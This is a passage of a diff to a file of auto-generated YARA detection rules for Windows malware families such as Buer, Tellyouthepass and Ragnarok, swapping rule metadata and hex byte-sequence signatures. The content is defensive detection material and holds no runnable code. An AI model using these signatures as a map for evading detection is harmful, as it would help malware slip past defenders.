-		logic_hash = "cc8e1228550694df797c7f86352429950a0d9bf3c450fac5ae045f777304a562"
+		logic_hash = "2840756e9ce2aef8d569e9bd5574fc7ae7c62b15ae58ef485173a9e6c40f95ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92817,37 +93133,32 @@ rule MALPEDIA_Win_Runningrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 56 ff15???????? 8b8c2418010000 }
-		$sequence_1 = { 8b4e24 51 ffd7 8b5628 6aff }
-		$sequence_2 = { 55 8b2d???????? 57 eb02 }
-		$sequence_3 = { 75b1 8b442418 8bce 0bc8 }
-		$sequence_4 = { 8b4e2c 2bca 894c2414 8b08 83f909 0f87fa060000 ff248dd0580110 }
-		$sequence_5 = { 894578 e8???????? 83c438 89457c 8b8c249c010000 5f 8bc5 }
-		$sequence_6 = { 7505 e8???????? 8a03 8b35???????? 8b3d???????? 3c26 }
-		$sequence_7 = { c7466c00000000 e8???????? 8b4c2410 8bc6 5f 5e }
-		$sequence_8 = { 2bc1 894c2430 f6c310 74d3 83e30f 3bc3 }
-		$sequence_9 = { 56 ff15???????? 8bf8 85ff 752b 68???????? e8???????? }
-		$sequence_10 = { 52 53 ff15???????? 5f 83f801 7406 ff15???????? }
-		$sequence_11 = { 7507 c74724b0302a00 8b4728 8b4f20 6a18 }
-		$sequence_12 = { 83f901 0f82fd020000 8b460c 8b4488fc eb02 33c0 }
-		$sequence_13 = { 55 8bac2408010000 56 33f6 }
-		$sequence_14 = { 890f c70005000000 8b4704 85c0 0f846fffffff 8b0f }
+		$sequence_0 = { 66c744243876d4 c785e0000000eb6cf5c3 c785e4000000994fa64a c785e8000000961a40af 66c785ec00000072ff c685ee000000e4 }
+		$sequence_1 = { 48895c2408 55 488d6c24a9 4881ec90000000 488d4de7 ba0d000000 c745e72af5766c }
+		$sequence_2 = { c745cc178fe463 66c745d07449 e8???????? 488bc8 ff15???????? }
+		$sequence_3 = { c644243660 c74424284071b330 66c744242c2f3e c644242e60 c74424407a767776 c74424447e767529 c74424205277bc30 }
+		$sequence_4 = { 488d8d88020000 ba13000000 488905???????? e8???????? }
+		$sequence_5 = { 89742450 6689b510020000 48898512020000 4889851a020000 66898522020000 6689b500030000 e8???????? }
+		$sequence_6 = { 4533db 458d4310 488d942430010000 488d4c2420 }
+		$sequence_7 = { 666666666666660f1f840000000000 0fb7040a 4883c102 6689440ffc 6685c0 75ee 488d8c2480020000 }
+		$sequence_8 = { c745e85b02d12d c745ecde00c41e c745f0b2db7461 c645f478 e8???????? 488bc8 ff15???????? }
+		$sequence_9 = { 488b05???????? 4889470e 8b05???????? 894716 33c0 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 1606656
 }
-rule MALPEDIA_Win_Mofksys_Auto : FILE
+rule MALPEDIA_Win_Interception_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b460e3c-29c6-5db2-a32f-e1a99c684da5"
+		id = "f1a298d5-70e2-5f27-b6ee-691574cd9abf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mofksys_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.interception_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "8c9a7d93274bbf5d514b6dd91aa6e0270b7fa1be2a34ea8caa7a062178ba1dc3"
+		logic_hash = "3520af3329a4b24d818d777e1e8f70b92d9cafa69a1f58bf6db64da9ed00530f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92861,32 +93172,32 @@ rule MALPEDIA_Win_Mofksys_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a1c 68???????? 8b5588 52 8b4584 50 ff15???????? }
-		$sequence_1 = { 56 ff5004 897de0 897ddc 897dd8 6a01 ff15???????? }
-		$sequence_2 = { ff15???????? 8b8d5cffffff 89412c c745fc86000000 8d55d4 52 6a00 }
-		$sequence_3 = { ff15???????? 33c9 837db400 0f95c1 f7d9 66894db0 8d4dc8 }
-		$sequence_4 = { 8b4de0 ff15???????? 50 ff15???????? c785f4fcffff00000000 ff15???????? }
-		$sequence_5 = { 8d4dc4 51 8b35???????? ffd6 50 57 }
-		$sequence_6 = { 8b4dd4 51 8d55dc 52 ff15???????? 8d45cc 50 }
-		$sequence_7 = { ff15???????? 8b4dd0 8b8530ffffff c1e002 eb09 ff15???????? 8b4dd0 }
-		$sequence_8 = { 6685f6 7413 668b0d???????? 51 ff15???????? e9???????? 668b15???????? }
-		$sequence_9 = { 8b5508 8b02 eb3a 8b4dd0 85c9 7424 66833901 }
+		$sequence_0 = { 83e61f 8d1c8520ae0010 c1e603 8b03 f644300401 7469 57 }
+		$sequence_1 = { 72f1 56 8bf1 c1e603 3b96e8710010 }
+		$sequence_2 = { c1f805 83e61f 8d1c8520ae0010 c1e603 8b03 }
+		$sequence_3 = { ffb6ec710010 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff }
+		$sequence_4 = { 8bd0 c1f905 83e21f 8b0c8d20ae0010 f644d10401 }
+		$sequence_5 = { 8d3c8520ae0010 c1e603 8b07 03c6 f6400401 7437 }
+		$sequence_6 = { f683c19c001004 7406 8816 46 }
+		$sequence_7 = { 8d542434 f3ab 66ab aa }
+		$sequence_8 = { 8bc8 83e01f c1f905 8b0c8d20ae0010 8a44c104 }
+		$sequence_9 = { 731c 8bc8 83e01f c1f905 8b0c8d20ae0010 f644c10401 8d04c1 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Milum_Auto : FILE
+rule MALPEDIA_Win_Tellyouthepass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8311a048-c504-508b-a4e8-52a8a481b8b1"
+		id = "b0d976f4-0236-5ffd-9bc3-701324f1d00b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.milum_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tellyouthepass_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6c7c97a327f6ef555ead1a0969df80007fb8d016e702f68476c0459b28700b82"
+		logic_hash = "ecb0bbbbbf71d6e52cc61fe6d246b41bf4e7a6e9ebef1f549c3bac2b8ab00a58"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92900,32 +93211,32 @@ rule MALPEDIA_Win_Milum_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8d5db4 53 8b5dac 53 8b5da0 50 }
-		$sequence_1 = { 8b4608 8d80349e4700 fe08 803800 7f1c 8bce e8???????? }
-		$sequence_2 = { c6460165 e8???????? 5f 8be5 5d c3 8d4bff }
-		$sequence_3 = { c745fc01000000 8d7b0f 395dac 7524 6a10 68???????? 8d4db8 }
-		$sequence_4 = { 8d45f4 64a300000000 8965f0 8b7d08 33f6 8975ec 897708 }
-		$sequence_5 = { 7506 8b4b08 894b10 8b16 837a1000 0f8560fdffff }
-		$sequence_6 = { 8bcc 8965bc 6aff 53 8d45d4 897114 895910 }
-		$sequence_7 = { 7456 50 53 8d4dd0 e8???????? eb3d 8b35???????? }
-		$sequence_8 = { c645fc02 83c204 8955d0 8b4304 3bf8 736d 8b13 }
-		$sequence_9 = { 7446 83ec1c 8bfc 89a5ecfdffff 83ec1c 8bcc 89a5e8fdffff }
+		$sequence_0 = { 4d21da 4d01d1 eb7c 4584c0 7409 833d????????00 7417 }
+		$sequence_1 = { e8???????? e8???????? 4889c3 488d05c54b0d00 0f1f440000 e8???????? 488d05b44b0d00 }
+		$sequence_2 = { e9???????? 4c8b542448 80fae2 0f85ae000000 4d8d5701 4d39d4 0f8650040000 }
+		$sequence_3 = { 48895c2410 488d0dcfcf0800 4839c8 7405 bb00000000 7578 488b0b }
+		$sequence_4 = { 488d8c24d0010000 e8???????? b801000000 488bac24c8030000 4881c4d0030000 c3 4c8b9424d8030000 }
+		$sequence_5 = { 8402 4881c2c0160000 4889d0 6690 e8???????? 488b4c2420 488d4101 }
+		$sequence_6 = { 7425 488905???????? 833d????????00 7509 48891d???????? eb0c 488d3daeb21b00 }
+		$sequence_7 = { 4d8d52d9 41803a00 0f1f00 0f84b2000000 90 4a8b4cc2f0 4a8b5cc2f8 }
+		$sequence_8 = { 7d34 884c2445 bb01000000 e8???????? 660f1f440000 84c0 0f842d150000 }
+		$sequence_9 = { bb17000000 e8???????? 488b442428 e8???????? 488d05ee551900 bb0a000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 1076224
+		7 of them and filesize < 7152640
 }
-rule MALPEDIA_Win_Buer_Auto : FILE
+rule MALPEDIA_Win_Shareip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a04d6e0-cd7f-5093-9f8c-3d9d8b9d18a4"
+		id = "c1bb89d1-f372-58e3-b942-2bef06089e9d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buer_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shareip_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "deb76d78e5600ee9ef4e7b63e09f28c10c8fc78def9e4354c583490d6447dafb"
+		logic_hash = "22f8defa170ad6011dfacc6043f0faf754eb6e381cb168ecc5d5e1f970ca56dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92939,38 +93250,32 @@ rule MALPEDIA_Win_Buer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bc7 7d0f 8a0c46 880c18 }
-		$sequence_1 = { 40 3bc2 7cf1 eb02 }
-		$sequence_2 = { 8d5001 85ff 7504 8bc2 }
-		$sequence_3 = { 894144 8b45f0 03c2 8b55e8 015158 }
-		$sequence_4 = { 8b55e8 015158 8b55d8 894148 8b45dc 03c6 }
-		$sequence_5 = { 60 64a130000000 8b400c 8b4014 8b00 8b4010 8945fc }
-		$sequence_6 = { 8a0c46 880c18 40 3bc2 }
-		$sequence_7 = { 83e801 7420 83e801 740b }
-		$sequence_8 = { 00c0 e9???????? f7da 890c24 8d6801 31c9 be3e000000 }
-		$sequence_9 = { 017708 b803000000 31d2 83c418 5e 5f c3 }
-		$sequence_10 = { 09f2 09ca 09c2 b801000000 ebd0 }
-		$sequence_11 = { 0fb617 47 89f9 83e23f eb11 8b7c2410 8b5c2408 }
-		$sequence_12 = { 01c7 0fa5da d3e3 8b4c2444 }
-		$sequence_13 = { 0fa4c208 c1e008 0fb6cb 09c1 89c8 83c414 }
-		$sequence_14 = { 01cf 0f92c1 08f9 751d }
-		$sequence_15 = { 0f84d7010000 8b442418 8b5c2404 8b54242c 894c2408 01c8 }
+		$sequence_0 = { 399c24c8000000 747a 399c24bc000000 7412 8b9424ac000000 8b02 }
+		$sequence_1 = { 89742444 895c2440 885c2430 396c2460 720d 8b44244c 50 }
+		$sequence_2 = { 83f8ff 7566 be10000000 39742444 720d 8b542430 52 }
+		$sequence_3 = { 5b 83c450 c21000 6aff 68???????? 64a100000000 50 }
+		$sequence_4 = { 8d442440 50 e8???????? 8b4c241c 51 8d94242c020000 52 }
+		$sequence_5 = { 80f92e 750f 807a0100 8d6a01 0f8480000000 eb06 84c9 }
+		$sequence_6 = { 7463 8d842454010000 e8???????? 83bc24c000000008 7210 8b9424ac000000 52 }
+		$sequence_7 = { 8bd1 c1fa05 c1e006 030495a0b74500 eb05 b8???????? f6400420 }
+		$sequence_8 = { 8d78ff 8d742414 e8???????? 50 bf01000000 e8???????? 8bd0 }
+		$sequence_9 = { 51 53 56 8bcd e8???????? 8bce 53 }
 
 	condition:
-		7 of them and filesize < 3031040
+		7 of them and filesize < 811008
 }
-rule MALPEDIA_Win_Halfrig_Auto : FILE
+rule MALPEDIA_Win_Shakti_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62b21a07-3d27-5219-adbb-784980e8887e"
+		id = "5b5fdc29-c870-550c-b3e7-47224f030c24"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.halfrig_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shakti_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "40d5c53e96f42e606a7012f83f1c1231408111cee8ecb6b2b8598f974593fa4a"
+		logic_hash = "f9488b8a8445549b2d17849193cda20ba79220110ad09656a16f1b56d9644dea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92984,32 +93289,38 @@ rule MALPEDIA_Win_Halfrig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 403835???????? 4c8d0d37670400 7439 488bd7 }
-		$sequence_1 = { 488d0d03d10600 e8???????? 833d????????ff 0f858a000000 488d542420 4c8bc6 }
-		$sequence_2 = { 488d0d9c6a0700 e8???????? 40383d???????? 7435 488bd3 4c8bc7 43301438 }
-		$sequence_3 = { 49ffc0 4833d0 4983f807 72db 40883d???????? 418b06 4c894e20 }
-		$sequence_4 = { 8802 488d542420 e8???????? 488d0d5cc00700 e8???????? 40383d???????? }
-		$sequence_5 = { e8???????? 488d0d20da0500 e8???????? 40383d???????? 7435 488bd3 }
-		$sequence_6 = { 48c1e008 488bd1 49ffc0 4833d0 4983f80c 72db 40883d???????? }
-		$sequence_7 = { 0f1149f0 4883ea01 75ad 0fb600 4c8d3d43ee0600 }
-		$sequence_8 = { 8801 418b06 3905???????? 0f8ea3000000 488d0da7b30500 }
-		$sequence_9 = { 40883d???????? 4c893d???????? 488d8d30030000 488d059c5a0200 488bd6 660f1f840000000000 488d8980000000 }
+		$sequence_0 = { 8b45cc 0fb608 83f961 7c12 8b55cc 0fb602 }
+		$sequence_1 = { 8b45cc 83c002 50 8b4dc0 51 ff55dc }
+		$sequence_2 = { 8945e0 837de000 0f848b000000 8b4de0 8b5128 }
+		$sequence_3 = { 8b55f8 0fb74206 8b4df8 668b5106 6683ea01 }
+		$sequence_4 = { 8b45cc 0fb608 034dfc 894dfc 8b55cc }
+		$sequence_5 = { 6a00 52 e8???????? 8d442418 }
+		$sequence_6 = { 662301 0fb7d0 8b45c0 25ffff0000 0fb7c8 8b45e0 }
+		$sequence_7 = { 0fb711 8b45c4 8d0c90 894dc4 }
+		$sequence_8 = { 55 8bec 51 51 a1???????? 8945f8 8b801c090000 }
+		$sequence_9 = { 7443 8b7de4 8d45e8 50 6a40 57 ff75f4 }
+		$sequence_10 = { 7281 ff75e8 e8???????? 59 }
+		$sequence_11 = { 894810 894808 c3 56 8b742408 }
+		$sequence_12 = { a3???????? a1???????? c705????????b5434000 8935???????? }
+		$sequence_13 = { 3b04cd10a04000 7413 41 83f92d }
+		$sequence_14 = { ff15???????? 68???????? 50 ff15???????? 8bf0 85f6 7468 }
+		$sequence_15 = { 888820a64000 40 ebe9 33c0 8945e4 }
 
 	condition:
-		7 of them and filesize < 1369088
+		7 of them and filesize < 191488
 }
-rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE
+rule MALPEDIA_Win_Unidentified_003_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93781915-1cb2-5abd-9774-3e668f8666c9"
+		id = "68c73429-01e2-51c8-be95-38ace5fc7e1c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_kt3_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_003_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "44b6f2b326248f3f927f1e4016d6365a022a7c825a43b779fc8768d5c422e7ad"
+		logic_hash = "1280401acbb116bbb5b04fa4063fd1d8d80a530174292f633236a0a89b7df590"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93023,32 +93334,32 @@ rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d0c 034dfc 894d0c 8b55f8 2b55fc }
-		$sequence_1 = { f2ae f7d1 83c1ff b804010000 2bc1 50 }
-		$sequence_2 = { 8b45d0 50 e8???????? 83c404 b801000000 5f 5e }
-		$sequence_3 = { c705????????043a4000 c705????????ac3a4000 a3???????? c3 }
-		$sequence_4 = { 8b4ddc 8b11 52 ff15???????? 0f8408000000 0f8502000000 }
-		$sequence_5 = { 51 ff15???????? 8b55e8 0fbe02 83f873 }
-		$sequence_6 = { e9???????? b911000000 33c0 8dbda8feffff f3ab c785a8feffff44000000 }
-		$sequence_7 = { 0f8408000000 0f8502000000 ebe9 8b85b0fdffff }
-		$sequence_8 = { 83e103 f3a4 eb68 8b4d08 c70100000000 6a3a 8b55e8 }
-		$sequence_9 = { 8985f0fbffff 0f8408000000 0f8502000000 ebe9 68???????? }
+		$sequence_0 = { e8???????? c70424???????? e8???????? 59 68???????? 891d???????? 891d???????? }
+		$sequence_1 = { 83c40c 895de8 8b45ec 8b08 8d55f0 52 53 }
+		$sequence_2 = { 56 68???????? ff75f8 ff15???????? ff75dc ff7508 }
+		$sequence_3 = { 68???????? e8???????? 56 68???????? e8???????? 83c410 8bc3 }
+		$sequence_4 = { 6a00 6a00 68???????? ff55fc eb07 50 }
+		$sequence_5 = { b8???????? 85c0 7420 ff750c 53 ff7644 e8???????? }
+		$sequence_6 = { 57 8bf8 33f6 8bd9 3bfe 7502 8bfb }
+		$sequence_7 = { 53 6a01 68???????? 68???????? 56 ff15???????? 57 }
+		$sequence_8 = { 8d85d0feffff 50 6888000000 ff15???????? 894624 3bc3 }
+		$sequence_9 = { 55 8bec 81ecb4000000 53 56 57 33f6 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Ketrum_Auto : FILE
+rule MALPEDIA_Win_Madmax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d00476b6-2e4b-5fca-a576-2efa8a16d1f4"
+		id = "9d1cbce1-ade8-5d76-a04c-20b098c8480b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ketrum_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.madmax_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f6a51a224da39f596220ff41861daa2df80eaaa43f4fe6e9b132d503abfda3ac"
+		logic_hash = "ad33eff006b5d6cb56b22d8686bde1b21a59becc38b8876b1c999d0a4976f07a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93062,38 +93373,32 @@ rule MALPEDIA_Win_Ketrum_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 037de0 8bda 8d8407e6cde121 c1c005 03c6 }
-		$sequence_1 = { 33c0 57 0fb7d0 8bc2 6a20 c1e210 }
-		$sequence_2 = { 53 53 ff15???????? 53 53 6a03 }
-		$sequence_3 = { c1f905 83e01f c1e006 8b0c8da0bc6200 8d440104 8020fe ff36 }
-		$sequence_4 = { 7407 6a01 e8???????? 8d8534fbffff 50 }
-		$sequence_5 = { 53 50 e8???????? 56 8d85fce7ffff }
-		$sequence_6 = { 59 be???????? 8dbd7cffffff f3a5 6a43 8d45b9 53 }
-		$sequence_7 = { 59 85c0 742f b9???????? 8bc1 8d7001 8a10 }
-		$sequence_8 = { e8???????? 83600400 eb23 6a03 8bf7 }
-		$sequence_9 = { 8b44241c 83c40c 837c242408 7302 8bc6 }
-		$sequence_10 = { 6a01 33ff 8db590efffff c645fc00 e8???????? 33f6 39b344010000 }
-		$sequence_11 = { e8???????? 83c410 8d8594e9ffff 50 }
-		$sequence_12 = { 0f87e9030000 ff248519574000 ff35???????? e9???????? }
-		$sequence_13 = { d1f8 8bf8 8bc6 8bd6 }
-		$sequence_14 = { 837db801 7621 6aff 57 8d45a8 8d7dcc }
-		$sequence_15 = { 39b8c0f94100 0f8491000000 ff45e4 83c030 3df0000000 }
+		$sequence_0 = { f6897b3c7a8156 c10a9c 7ed2 1550605965 91 186b72 b293 }
+		$sequence_1 = { b852e635a0 b5cb 85c6 1cfe 48 853f 237ab7 }
+		$sequence_2 = { f64f0a9b 10678e 58 b0df af 72f1 e5c9 }
+		$sequence_3 = { d6 b401 db59f6 55 94 58 4c }
+		$sequence_4 = { f8 df29 18ce 84617b 0ca6 08ba685649a2 7b28 }
+		$sequence_5 = { a7 16 d293b6f8cf83 91 63636f 834bb565 98 }
+		$sequence_6 = { fc 5b 359e973298 1816 2a3ce4 7d62 f616 }
+		$sequence_7 = { e02e fa 4b 2f d9e0 cd6c 3adf }
+		$sequence_8 = { 8d8508feffff 9c f605????????d3 0f85d3000000 3efd 27 40 }
+		$sequence_9 = { e652 45 23a7cb3626db a9886e48e3 3407 d120 c1f37d }
 
 	condition:
-		7 of them and filesize < 4599808
+		7 of them and filesize < 3227648
 }
-rule MALPEDIA_Win_Wormhole_Auto : FILE
+rule MALPEDIA_Win_Crypmic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e1610a26-8f6a-525e-a150-ab4ce6e346e4"
+		id = "a619fa41-ae29-5844-bc2f-097bc7d852ef"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wormhole_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crypmic_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "98b6efb48ef674cd1e4efeda549804876add0f8847a14dfa9ff2b839bd666e8b"
+		logic_hash = "bac6071bafa0b8d2c9908dd1914b7cdff1ecb7962c586174feb22c09b0eeeac5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93107,32 +93412,32 @@ rule MALPEDIA_Win_Wormhole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 6a00 6808000100 51 }
-		$sequence_1 = { 48 83c880 40 83c040 }
-		$sequence_2 = { 85c0 7e0f 2bf0 03f8 85f6 7fc8 5f }
-		$sequence_3 = { 83c880 40 83c040 89442418 50 }
-		$sequence_4 = { 8b6c2420 8b5c2414 8b7c2418 6a00 }
-		$sequence_5 = { ffd3 8b35???????? 8d44240c 8b4c2410 50 51 ffd6 }
-		$sequence_6 = { 6a78 8d542410 50 52 57 e8???????? }
-		$sequence_7 = { 52 57 e8???????? 83c410 85c0 748f }
-		$sequence_8 = { 52 ffd6 8b44240c 8b4c2414 50 }
-		$sequence_9 = { 6a00 51 6a02 89442424 ffd3 }
+		$sequence_0 = { 0fb7d2 41 66891406 8d3409 }
+		$sequence_1 = { 66833800 75f6 8d3c72 33c0 }
+		$sequence_2 = { 8bec 83ec10 837d0800 8bc2 }
+		$sequence_3 = { ffd0 85c0 7e0e 8b4dfc 03c8 894dfc 2bf0 }
+		$sequence_4 = { 8b550c 53 2bc2 56 8945f0 }
+		$sequence_5 = { 894f04 8b4de8 894f08 668b4df0 66894f0c 668b45f2 6689470e }
+		$sequence_6 = { 8b7df0 b90e000000 f3a4 8b7dfc 6a00 }
+		$sequence_7 = { 5d c3 8b55fc 5f 8b4224 5e }
+		$sequence_8 = { ff4d08 89550c 7582 5f }
+		$sequence_9 = { 57 ffd1 8bc3 5f 5e 5b }
 
 	condition:
-		7 of them and filesize < 99576
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Newpass_Auto : FILE
+rule MALPEDIA_Win_Catchamas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1259b84e-f22e-5be6-af9b-9be76f957f31"
+		id = "169e4746-2f72-5821-b507-b8a47f5cbc09"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newpass_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.catchamas_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "348cb83a48a4b33ccc0bbb52d51d9d135a00878f03abb1cd8978354d39a99336"
+		logic_hash = "23c971887be94861d8baba1aeb0cd2edf205b86ca05876ee11e3ee91d8d84d51"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93146,32 +93451,32 @@ rule MALPEDIA_Win_Newpass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffc2 48ffc1 83fa0a 72dc c605????????00 488b5dc8 488d55b8 }
-		$sequence_1 = { 498b0f e8???????? 49c747180f000000 4d896f10 41c60700 498bc4 }
-		$sequence_2 = { 0fb705???????? 48c7455807000000 48895d50 66895d40 6685c0 7505 }
-		$sequence_3 = { 83c2c9 eb25 80e961 80f905 7705 83c2a9 }
-		$sequence_4 = { 49d1e8 483bc8 4c0f47c2 4d85c0 744a 482bf9 0fb7041f }
-		$sequence_5 = { 4c3bff 4d0f42c7 4d85c0 7504 33c0 eb05 e8???????? }
-		$sequence_6 = { 4c0f47c2 4d85c0 744a 482bf9 0fb7041f 0fb70b 48ffc2 }
-		$sequence_7 = { eb13 4983c8ff 0f1f440000 49ffc0 43803c0200 75f6 498bd2 }
-		$sequence_8 = { 488939 4885ff 783f 48b800000000ffffffff c7411006320000 ba063a0000 }
-		$sequence_9 = { 498bd5 488bcb e8???????? 84c0 0f84f4feffff eb1e 4c8b6c2438 }
+		$sequence_0 = { 8d5c2438 e8???????? 50 ff15???????? 56 6a00 ff15???????? }
+		$sequence_1 = { e8???????? 889c243c010000 8b442428 83c0f0 8d500c }
+		$sequence_2 = { 7c86 5e 5d 57 ff15???????? ff15???????? 5f }
+		$sequence_3 = { 53 ff15???????? b92a000000 be???????? 8d7c2418 f3a5 }
+		$sequence_4 = { 8bff baba000000 663bf2 720a bac0000000 663bf2 760c }
+		$sequence_5 = { 6a01 8d4c2420 50 8944241c }
+		$sequence_6 = { 8b8c2404080000 33cc e8???????? 81c408080000 c3 8d44240c 8bd0 }
+		$sequence_7 = { 53 ff15???????? 33c0 5f 5e 5b 8b8c24c8010000 }
+		$sequence_8 = { c3 8d44240c 8bd0 2bf2 8a08 880c06 }
+		$sequence_9 = { e8???????? 8b35???????? 8b4c2418 833900 0f855d050000 8bd1 }
 
 	condition:
-		7 of them and filesize < 2654208
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Oderoor_Auto : FILE
+rule MALPEDIA_Win_Ragnarok_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8af6addc-ebdd-5e5f-9273-b365bc983ffd"
+		id = "e51b7730-611b-519c-90af-8c932bd35b31"
 		date = "2024-10-31"
 		modified = "2024-11-11"
